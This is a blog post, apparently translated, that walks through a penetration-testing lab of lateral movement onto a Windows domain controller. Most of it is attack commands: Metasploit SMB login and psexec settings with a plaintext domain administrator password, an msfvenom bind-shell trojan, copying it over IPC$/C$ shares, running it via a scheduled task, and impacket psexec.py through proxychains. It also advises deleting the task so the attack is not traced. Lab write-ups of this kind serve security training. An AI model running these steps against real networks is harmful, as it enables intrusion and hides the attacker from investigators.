Taking down the domain controller of ATT&CK series I of Intranet horizontal penetration

information gathering

Information collection domain controller related information:

Through arp scanning, it is found that the ip address of the domain controller is Try to use the smb of msf_ Whether the login module successfully logs into smb

1 search smb_login
2 use 0
3 set rhosts
4 set smbpass hongrisec@2022
5 set smbuser Administrator
6 set smbdomain GOD
7 run

I have obtained the user name, password and domain in the previous article, so I won't repeat it here. If you don't know how to obtain it, please move to the article Information collection of ATT & CK series of internal network horizontal penetration The above figure shows that the user name and password are correct.

Take domain control

1, IPC $with msf Trojan horse

Because it is an internal domain, the target host cannot go out of the network, so the payload uses a forward connection (bind)

1 # Generate Trojan horse
2 msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT=3333 -f exe -o bind.exe
3 # Then upload it to the springboard machine through the ant sword(win7)

Jump board (winc) $)

1 # IPC$ Remote login target host
2 net use \\\ipc$ /user:Administrator "hongrisec@2022"

Prompt: the command is executed successfully. Next step:

1 # Copy back door to domain controller temp Under the directory
2 copy bind.exe \\\c$\bind.exe

Check whether the upload is successful:

1 # View files in the specified directory
2 dir \\\c$

Create scheduled task

1 # View time of target host
2 net time \\
3 # Create a scheduled task at a certain time after this time, and the task name spmonkey
4 at \\ 12:40:00 c:\bind.exe
7 # Delete created task
8 at \\ 2 /delete

Return to msf listening port

1 exit # sign out shell pattern
2 backgroud # Background operation session
3 use exploit/multi/handler
4 set payload windows/meterpreter/bind_tcp
5 set RHOST
6 set LPORT 3333
7 run
8 # Waiting for scheduled task execution

When the scheduled task time is up and there is still no conversation back, the shell method fails!

Note: after the planned task is executed, remember to use the command to delete the task, otherwise it will be traced to the source.

2, Use psexec module in msf to win domain control

psexec popular science

Psexec is a very good remote command line tool under windows. The use of psexec does not require the other host to turn on port 3389, but only the other host to turn on the admin $share (this share is turned on by default). However, if the target host has opened the firewall, psexec cannot be used, and it will prompt that the network path cannot be found. Since psexec is a tool provided by windows, anti-virus software will add it to the white list.

The basic principle of psexec is to create a psexec service on the remote target machine through pipeline and generate a binary file named "PSEXESVC" in the local disk. Then, run the command through psexec service, and delete the service after running.

When using psexec to execute remote commands, a psexec service is created in the target system. After the command is executed, the psexec service will be automatically deleted. Since a large number of logs will be generated when creating or deleting services, the attack process will be pushed back through logs when tracing the source of the attack.

1 search psexec # lookup psexec modular
2 use exploit/windows/smb/psexec
3 set payload windows/meterpreter/bind_tcp
4 set RHOSTS
5 set SMBPass hongrisec@2022
6 set SMBUser Administrator
7 set SMBDomain GOD
8 run

The attack succeeded, but no session was generated. This method also failed!

3, Use the psexec script of python to win the domain control

After consulting various materials, I found a python script of psexec. I would like to thank the master who wrote this script: beto (@agsolino).

Use git to get script in kali: git clone https://github.com/CoreSecurity/impacket.git , modify kali's python version to 3. *, cd enter the impacket directory and run python setup Py install. After the execution is completed, the preparations are completed.

Start to win domain control:

1. Find the directory where the psexec script is located and enter the directory

1 find . -name "psexec*"

2. Run psexec. Using a proxy tunnel Py script

1 proxychains python psexec.py 'Administrator:hongrisec@2022@'

The values of '' are user name: password @ target host ip address

Successfully return to the shell to view the permissions

Enter the directory and delete the previously uploaded msf Trojan horse

1 cd C:\
2 del/f/s/q C:\bind.exe


beto (@agsolino)


Here, after taking domain control, the att & CK series will come to an end. There are many knowledge points involved. If you don't understand, you can add me vx: fbi041699 to indicate your intention!


Tags: Cyber Security

Posted by jingcleovil on Thu, 12 May 2022 13:05:02 +0300